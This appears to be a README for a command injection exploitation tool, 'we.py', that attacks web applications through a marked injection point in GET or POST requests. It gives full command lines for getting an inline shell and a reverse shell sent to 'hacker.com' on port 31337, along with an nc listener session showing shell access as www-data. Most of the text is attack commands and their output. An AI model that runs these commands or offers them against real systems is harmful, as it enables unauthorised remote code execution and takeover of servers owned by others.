Latest commit 80c743a
Mar 17, 2013
Web Exploitation Engine - Generic Command Injection Exploitation Utility.

This is a simple utility written to exploit command injection bugs in web applications. I had abandoned this project a while ago, then saw the brilliant "rce.py" tool written by @LaNMaSteR53, and saw his elegant solution to the "how to denote where to put the payload" problem, so I shamelessly ripped his code to write this.

This tool can either give an inline shell like the original rce.py (it uses the same functions, just rewritten to suit), or a reverse shell. Currently it only supports a Base64-encoded reverse TCP shell payload; however, the magic of the "payloads" module is that you can expand it. You just have to do a little work to add more payloads.

So, how do I use this? The only mandatory argument is --url='URL HERE'. In the URL, the <rce> tag marks where the command is injected into the request; everything else in the URL is sent as-is. For example:

```
h4x# ./we.py --url='http://localhost/test/cmd.php?cmd=<rce>'
shell> id
[*] Executed: id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
shell>
```

By default, it assumes a GET request and uses the inline shell mode. To specify a POST request, you pass the params and values just like a GET, except you add --method=post to tell the parser it is a POST injection (the query string becomes the POST body). For example:

```
h4x# ./we.py --url='http://localhost/test/cmd-post.php?cmd=<rce>' --method=post
shell> id
[*] Executed: id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
shell>
```

The --shell argument tells it whether you want an inline or a reverse shell. Default operation is the "inline shell" like the original rce.py script. To get a reverse shell, --shell=reverse is needed, and you must also tell it the host and port to connect back to: the --lhost and --lport arguments default to 127.0.0.1 and 4444 respectively. So, to get a reverse shell sent to port 31337 on "hacker.com", using the above GET request exploit, we can do the following.
```
h4x# ./we.py --url='http://localhost/test/cmd.php?cmd=<rce>' --shell=reverse --lhost=hacker.com --lport=31337
[+] Doing a reverse shell!
[*] LHOST: hacker.com
[*] LPORT: 31337
[!] Hope your listener is listening
```

Start the listener before running we.py: the target connects out exactly once, when the injected payload executes, and there is nothing to catch the connection if nc is not already waiting. Over at "hacker.com" (localhost on my box for this demo), we get the following:

```
# nc -lvp 31337
listening on [any] 31337 ...
connect to [127.0.0.1] from localhost [127.0.0.1] 58794
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$
```

Reverse shell access works rather flawlessly. For now, there is just the python-reverse payload; however, I hope to add a python bindshell soon, along with, perhaps, some Perl payloads for extra fun.